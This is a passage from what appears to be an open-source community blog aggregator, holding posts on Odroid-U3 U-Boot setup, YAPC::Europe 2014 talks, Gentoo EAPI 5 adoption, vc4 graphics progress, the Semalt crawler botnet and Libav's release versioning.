setenv initrd_high "0xffffffff"
setenv fdt_high "0xffffffff"
setenv fb_x_res "1920"
setenv fb_y_res "1080"
setenv hdmi_phy_res "1080"
setenv bootcmd "fatload mmc 0:1 0x40008000 kernel-3.17-rc2; bootm 0x40008000"
setenv bootargs "console=tty1 console=ttySAC1,115200n8 fb_x_res=${fb_x_res} fb_y_res=${fb_y_res} hdmi_phy_res=${hdmi_phy_res} root=/dev/mmcblk0p2 rootwait ro mem=2047M"
and run this

mkimage -A arm -T script -C none -n "Boot.scr for odroid-u3" -d boot.txt boot.scr
That should do it :D

I used steev (a fellow gentoo dev) and as sources.

YAPC::Europe 2014, day 2 The Party Line | 2014-08-23 14:23 UTC

Ignat Ignatov talked about physical formulas. When I was planning to attend this talk, I thought it is going to be some sort of symbolic formulas computation, possibly with an analysis of dimensions of the physical quantities.
However, despite my (a bit long in the tooth) background in physics, I did not understand a word of it. Apparently, some sort of unification of physical formulas, not entirely unlike the periodic table in chemistry, was presented, with almost no comprehensible details and with scary words like co-homology and algebraic topology. The fact that half of the slides were in Russian, while irrelevant for me personally, probably did not help matters for the majority of the people in the audience. I did not expect any questions at the end of the talk, but there were at least two, so I was probably wrong about general level of understanding in the audience.

Laurent Dami talked about SQL::Abstract::FromQuery. He presented a query form of the Request Tracker and said that it is too complex - a premise many would agree with. The conclusion was that some more natural way to allow the user to specify complex queries is needed. Surprizingly, the answer to that was to use a formal grammar and make the user adhere to it. To me this sounds weird, but if one can find a non-empty set of users that would tolerate this, it may just work.

Denis Banovic talked about Docker, a virtualization container. I did not know much about Docker until this point, so it was useful to have someone to explain it to me.

The next talk was long, 50 minutes (as opposed to a somewhat standard for this conference 20 minutes) Peter "ribasushi" Rabbitson presented a crash-course in SQL syntax and concepts. It looked like a beginner-level introduction to SQL, but it became better and better as it progressed. I even learned a thing or two myself. ribasushi has a way of explaining rather complicated things concisely, understandably, and memorizably at the same time. Excellent talk.

Then there was a customary Subway sandwiches lunch.

Naim Shafiyev talked about network infrastructure automatization. Since this is closely related to what I do at my day job, I paid considerable attention to what he had to say. I did not hear anything new, but hopefuly the rest of the audience found the talk more useful. It did inspire me to submit a lightning talk though.

osfameron talked about immutable data structures in Perl and how to clone them with modifications, while making sure that the code does not look too ugly. Pretty standard stuff for functional languages, but pretty unusual in the land of Perl. The presentation was lively, with a lot of funny pictures and Donald duck examples.

The coffee break was followed by another session of lightning talks, preceeded by a give-away of a number of free books for the first-time YAPC attendees. Among the talks I remembered were SQLite virtual tables support in Perl by Laurent Dami, web-based database table editor by Simun Kodzoman, LeoNerd's presentation about XMPP replacement called Matrix, a Turing-complete (even if obfuscated) templating system by Jean-Baptiste Mazon of Sophia (sp!), and annoucements of Nordic Perl Workshop 2014 (Helsinki, November) and Nordic Perl Workshop 2015 (Oslo, May).

Again, I did not go to the end-of-the-day keynote.

As a side note, the wireless seemed to be substantially more flaky than yesterday, which has affected at least some lightning talk presenters.

Aufgerüstet My Universe | 2014-08-23 13:17 UTC

Nachdem mein Rechner zu Beginn des Jahres mit dem Einbau einer Nvidia GeForce GTX 780 Ti an den Leistungshunger von X-Plane 10 angepasst wurde, erfolgte heute endlich das lang ersehnte Upgrade der Peripherie.

Diesen riesigen Karton musste der Postbote über die Kraterlandschaft vor unserer Haustüre heranschleppen. Und dass nicht nur Luft darin war, ließ sich leicht am Gewicht feststellen…

Ausgepackt und aufgebaut geben die neuen Peripherie-Geräte (Saitek Pro Flight Ruderpedale sowie ein Thrustmaster Hotas Warthog Joystick nebst zugehörigem Throttle Quadrant) meinem heimatlichen Cockpit gleich ein anderes Aussehen — zum Größenvergleich, der Monitor ist mit 24″ auch nicht gerade klein…

So richtig Nerd-gerecht wird’s aber erst, wenn der Rechner Strom liefert. Der Throttle Quadrant ist mit einer ganzen Reihe LEDs bestens dafür ausgerüstet, auch bei Nachtflügen eine gute Figur zu machen.

Jetzt wird aber erst mal installiert und ausgiebig getestet. Wie sich die neue Peripherie im Flug bewährt, berichte ich dann bei Gelegenheit in einem neuen Posting.

Hier Spukt's My Universe | 2014-08-22 19:15 UTC

Vor knapp vier Monaten hatte ich die Website mit Nikola wiederbelebt — für mich eine gute, weil vor allem einfach umzusetzende Lösung. Nach vier Monaten war es nun Zeit, einmal Bilanz zu ziehen. Erwartungsgemäß ist Nikola enorm leistungsfähig, was das Rendering von Postings angeht — reStructuredText ist in Sachen Funktionsumfang und Erweiterbarkeit nur schwer zu schlagen; insbesondere Code-Beispiele werden dank Pygments wunderbar dargestellt.

So gut sich mit Nikola ein einzelnes Posting bearbeiten lässt, so umständlich ist allerdings auch der Publishing-Workflow. Hier muss ich mir klar eingestehen, dass ich falsche Vorstellungen davon hatte, wie langwierig und aufwändig die Veröffentlichung eines neuen Postings tatsächlich ist — schließlich will der gesamte Blog neu gerendert werden. Der Workflow sieht dabei so aus, dass zunächst ein Posting verfasst wird. Anschließend muss die Site neu gerendert werden; betrachten lässt sie sich korrekt dann nur über einen lokal gestarteten Webserver.

Noch ärger sieht die Sache aus, wenn es nur um die Korrektur eines simplen Buchstaben- oder Zahlendrehers geht. Auch hierfür muss die gesamte Maschinerie angeworfen werden — und abgesehen davon ist das auch immer nur auf einem Rechner möglich, auf dem die korrekte Nikola-Version installiert und ein Remote-Zugang für's Publishing auf dem Server eingerichtet ist.

Eher zufällig bin ich über ghost gestolpert, eine noch junge Blog-Software, die auf node.js basiert und stark auf die Erstellung von Inhalten fokussiert. Eigene Tests mit einer lokalen Ghost-Installation haben mich stark begeistert, und ich fing an, an einem angepassten Theme zu basteln und spaßeshalber ein paar Postings aus meinem bestehenden Blog in das von ghost verwendete Markdown-Format zu portieren.

Irgendwann wurde aus der Bastelei schließlich Ernst, und ich beschäftigte mich mit dem Deployment von ghost als Produktivumgebung und der Integration einer Isso-basierten Kommentarfunktion. Insbesondere der Aufbau eines eigenen Isso-Systems erwies sich als ziemliche Herausforderung; mit uWSGI ließ sich schließlich aber eine stabile Installation aufbauen.

So entstand Zug um Zug die aktuelle Produktivumgebung, die mir mittlerweile so gut gefällt, dass ich heute die Migration meiner Website in die Wege geleitet habe. Im Laufe der nächsten Stunden sollten die DNS Records überall aktualisiert werden, so dass diese Seite wohl ab morgen auch unter der www-Subdomain zu erreichen sein dürfte. Noch sind natürlich lange nicht alle Inhalte des alten Blogs konvertiert; das wird sich wohl noch über einige Wochen hinziehen. Bedenkt man jedoch, dass die jüngsten noch nicht migrierten Postings aus dem März 2012 stammen, wird die wohl kaum jemand ernstlich vermissen.

As of today, more than 50% of the 37527 ebuilds in the Gentoo portage tree use the newest ebuild API (EAPI) version, EAPI=5!
The details of the various EAPIs can be found in the package manager specification (PMS); the most notable new feature of EAPI 5, which has sped up acceptance a lot is the introduction of so-called subslots. A package A can specify a subslot, another package B that depends on it can specify that it needs to be rebuilt when the subslot of A changes. This leads to much more elegant solutions for many of the the link or installation path problems that revdep-rebuild, emerge @preserved-rebuild, or e.g. perl-cleaner try to solve... Another useful new feature in EAPI=5 is the masking of use-flags specifically for stable-marked ebuilds.
You can follow the adoption of EAPIs in the portage tree on an automatically updated graph page.

YAPC::Europe 2014, day 1 The Party Line | 2014-08-22 14:51 UTC

When I came to the venue 15 minutes before the official start of the registration, people at the registration desk were busily cutting sheets of paper into attendees' badges. Finding my badge turned out to be a tad not trivial.

This conference is somewhat unusual not only because it is conducted over the weekend instead of in the middle of the week, but also because the keynotes for every day are pushed till the end, even after the daily lightning talks session.

The welcome talk from Marian was about practical things such as rooms locations, dinner, lunches, transportations and so on. Then I went on stage to declare the location of YAPC::Europe 2015 (which is Granada, Spain by the way). After that Jose Luis Martinez from did a short presentation of YAPC in Granada, and Diego Kuperman gave a little present from Granada to Sofia.

Mihai Pop of presented a talk called "Perl Secret". It was basically a 20-minutes version of BooK's lightning talk about Perl secret operators, somewhat duluted by interspersing references to minions. It was entertaining.

The great Mark Overmeer talked about translation with context. He went beyond the usual example of multiple variants of plural values in some languages, and talked about solving localization problems related to gender and so on. The module solving these problems is Log::Report::Translate::Context. As always, great attention to details from Mark.

After lunch (sandwiches from Subway), Alex Balhatchet of Nestoria presented hurdles of geocoding, with solutions. I and my co-workers had encountered similar problems on a far smaller scale, so I could understand the pains, and had a great interest in hearing about the solutions.

Then I attended a very inspiring talk by Max Maischein from Frankfurt about using Perl as a DNLA remote and as a DNLA media server. I immediately felt the urge to play with the code he published and try to adapt it to my own TV at home. There was even a live demo of using DNLA to stream to Max's laptop a live stream of the talk provided by the conference organizers. And it even worked, mostly.

Ervin Ruci talked more about geocoding — this talk was partially touching the same problems Alex Balhatchet was talking about. Unfortunately, it was substantially less detailed, so I was somewhat underwhelmed by it. The presenter mentioned cool things like dealing with fuzzyness of the input data using hidden Markov models, but did not expand on them.

StrayTaoist described how to access raw data from space telescopes using (of course) Perl. Very lively talk. There was a lot of austronomy porn in here.

Luboŝ Kolouch from Czech Republic talked about automotive logistics, and how open source solutions work where proprietory solutions do not. The software needs to be reliable enough to make sure that it takes only 1.5 hours between the part order and its physical delivery to the factory.

After coffee break with more mingling the inimitable R Geoffrey Avery choir-mastered an hour of lightning talks. Most talks were somewhat "serious" today; I hope we see more "fun" ones in the next coming days.

Unfortunately, I missed the first keynote of the conference from Curtis "Ovid" Poe, so cannot really say anything about it.

Finally, we went to Restaurant Lebed for the conference dinner. The location is superb, there is a great view over a lake. The food was great, too. We also got to enjoy some ethnic Bulgarian music and dancing, not too much, and not too little.

Lots of cheers to Marian and the team of volunteers for organizing what so far turns out to be a great conference.

X with glamor on vc4 anholt's lj | 2014-08-21 23:58 UTC

Today I finally got X up on my vc4 driver using glamor.  As you can see, there are a bunch of visual issues, and what you can't see is that after a few frames of those gears the hardware locked up and didn't come back.  It's still major progress.
The code can be found in my vc4 branch of mesa and linux-2.6, and the glamor branch of my xf86-video-modesetting.  I think the driver's at the point now that someone else could potentially participate.  I've intentionally left a bunch of easy problems -- things like supporting the SCS, DST, DPH, and XPD opcodes, for which we have piglit tests (in glean) and are just a matter of translating the math from TGSI's vec4 instruction set (documented in tgsi.rst) to the scalar QIR opcodes.

It all started with this commit from Jordan Hubbard on August 21, 1994:

Ja, Telefonica gibt mir kein IPv6, aber dann will ich wenigstens diese „IPv4,5″ haben, wie es gestern bei der ARD in PlusMinus zu sehen war:

It all started with this commit from Jordan Hubbard on August 21, 1994:

Commit my new ports make macros
Still not 100% complete yet by any means but fairly usable at this stage.

Twenty years later the ports tree is still there and actively
maintained. A video was prepared to celebrate the event and to thank
all of you who give some of their spare time and energy to the project!

Was ist Kiva? | 2014-08-20 13:10 UTC

Für alle, die Kiva noch nicht kennen gibt es ein neues Werbevideo, das  in gut 1:30 erzählt was Kiva ist. Sehr schön gemacht:

Die Anmeldung ist sehr einfach, und das Team Netzwerft freut sich auch über jedes neue Mitglied.

I’m slowly but surely starting to switch to a new laptop. The old one hasn’t completely died (yet) but given that I had to force its CPU frequency at the lowest Hz or the CPU would burn (and the system suddenly shut down due to heat issues), and that the connection between the battery and laptop fails (so even new battery didn’t help out) so I couldn’t use it as a laptop… well, let’s say the new laptop is welcome ;-)

Building Gentoo isn’t an issue (having only a few hours per day to work on it is) and while I’m at it, I’m also experimenting with EFI (currently still without secure boot, but with EFI) and such. Considering that the Gentoo Handbook needs quite a few updates (and I’m thinking to do more than just small updates) knowing how EFI works is a Good Thing ™.

For those interested – the EFI stub kernel instructions in the article on the wiki, and also in Greg’s wonderful post on booting a self-signed Linux kernel (which I will do later) work pretty well. I didn’t try out the “Adding more kernels” section in it, as I need to be able to (sometimes) edit the boot options (which isn’t easy to accomplish with EFI stub-supporting kernels afaics). So I installed Gummiboot (and created a wiki article on it).

Lots of things still planned, so little time. But at least building chromium is now a bit faster – instead of 5 hours and 16 minutes, I can now enjoy the newer versions after little less than 40 minutes.

Meine letzte Anfrage beim Geschäftskunden-Support ist schon wieder etwas her, daher war es mal wieder Zeit nachzufragen. Die Antwort war jetzt nicht viel besser:

einen genauen Zeitplan für die Einführung von IPv6 gibt es leider noch nicht. Telefónica Germany wird zu einem späteren Zeitpunkten die IPv6-Unterstützung einführen.

In my previous post on the matter, I called for a boycott of Semalt by blocking access to your servers from their crawler, after a very bad-looking exchange on Twitter with a supposed representative of theirs.

After I posted that, I got threatened by the same representative to be sued for libel, even though what that post was about was documenting their current practices, rather than shaming them. This got enough attention of other people who has been following the Semalt situation so that I could actually gather some more information on the matter.

In particular, there are two interesting blog posts by Joram van den Boezen about the company and its tactics. Turns out that what I thought was a very strange private cloud set up – coming as it was from Malaysia – was actually a botnet. Indeed, what appears from Joram's investigations is that the people behind Semalt use sidecar malware both to gather URLs to crawl, and to crawl them. And this, according to their hosting provider is allowed because they make it clear in their software's license.

This is consistent with what I have seen of Semalt on my server: rather than my blog – which fares pretty well on the web as a source of information – I found them requesting my website, which is almost dead. Looking at all the websites in all my servers, the only other affected is my friend's which is by far not really an important one. But if we start from accepting Joram's findings (and I have no reason not to), then I can see how that can happen.

My friend's website is visited mostly by the people in the area we grew up in, and general friends of his. I know how bad their computers can be, as I have been doing tech support on them for years, and paid my bills that way. Computers that were bought either without a Windows license or with Windows Vista, that got XP installed on them so badly that they couldn't get updates even when they were available. Windows 7 updates that were done without actually possessing a license, and so on so forth. I have, at some point, added a ModRewrite-based warning for a few known viruses that would alter the Internet Explorer User-Agent field.

Add to this that even those who shouldn't be strapped for cash would want to avoid paying for anything if they can, you can see why software such as SoundFrost and other similar "tools" to download YouTube videos into music files would be quite likely to be found in computers that end up browsing my friend's site.

What remains still not clear from all this information is why they are doing it. As I said in my previous post, there is no reason to abuse the referrer field, that is, beside to spam the statistics of the websites. Since the company is selling SEO services, one assumes that they do so to attract more customers. After all, if you spend time checking your Analytics output, you probably are the target audience of SEO services.

But after that, there are still questions that have no answer. How can that company do any analytics when they don't really seem to have any infrastructure but rather use botnets for finding and accessing websites? Do they only make money with their subscriptions? And here is where things can get tricky, because I can only hypothesize and speculate, words that are dangerous to begin with.

What I can tell you is that out there, many people have no scruple, and I'm not referring to Semalt here. When I tried to raise awareness about them on Reddit (a site that I don't generally like, but that can be put to good use sometimes), I stopped by the subreddit to get an idea of what kind of people would be around there. It was not as I was expecting, not at all. Indeed what I found is that there are people out there seriously considering using black hat SEO services. Again, this is speculation, but my assumption is that these are consultants that basically want to show their clients that their services are worth it by inflating the access statistics to the websites.

So either these consultants just buy the services out of companies like Semalt, or even the final site owners don't understand that a company promising "more accesses" does not really mean "more people actually looking at your website and considering your services". It's hard for people who don't understand the technology to discern between "accesses" and "eyeballs'. It's not much different from the fake Twitter followers, studied by Barracuda Labs a couple of years ago — I know I read a more thorough study of one of the websites selling this kind of money but I can't find it. That's why I usually keep that stuff on Readability.

So once again, give some antibiotics to the network, and help cure the web from people like Semalt and the people who would buy their services.

Well, I added one way links to my Facebook and Twitter pages.

Please understand that I use these as one way faucets to social networks. I automatically post everything from this site there, but there is no additional content or contact possibilities feeding back. This includes tracking on my side of things. If you want to use social media to stay up to date feel free to do so, keep in mind that I will not react to contact requests from those sites.

Libav Release Process Luca Barbato | 2014-08-16 15:23 UTC

Since the release document is lacking here few notes on how it works, it will be updated soon =).


Libav has separate version for each library provided. As usual the major version bump signifies an ABI-incompatible change, a minor version bump marks a specific feature introduction or removal.
It is made this way to let users leverage the pkgconf checks to require features instead of use a compile+link check.
The APIChange document details which version corresponds to which feature.

The Libav global version number e.g. 9.16 provides mainly the following information:

  • If the major number is updated the Libraries have ABI differences.
    • If the major number is Even API-incompatible changes should be expected, downstreams should follow the migration guide to update their code.
    • If the major number is Odd no API-incompatible changes happened and a simple rebuild **must** be enough to use the new library.
  • If the minor number is updated that means that enough bugfixes piled up during the month/2weeks period and a new point release is available.

Major releases

All the major releases start with a major version bump of all the libraries. This automatically enables new ABI incompatible code and disables old deprecated code. Later or within the same patch the preprocessor guards and the deprecated code gets removed.


Once the major bump is committed the first alpha is tagged. Alphas live within the master branch, the codebase can still accept features updates (e.g. small new decoders or new demuxers) but the API and ABI cannot have incompatible changes till the next one or two major releases.


The first beta tag also marks the start of the new release branch.
From this point all the bugfixes that hit the master will be backported, no feature changes are accepted in the branch.


The release is not different from a beta, it is still a tag in the release branch. The level of confidence nothing breaks is much higher though.

Point releases

Point releases are bugfix-only releases and they aim to provide seamless security updates.

Since most bugs in Libav are security concerns users should update as soon the new release is out. We keep our continuous integration system monitoring all the release branches in addition to the master branch to be confident that backported bugfixes do not cause unexpected issues.

Libav 11

The first beta for the release 11 should appear in the next two days, please help us by testing and reporting bugs.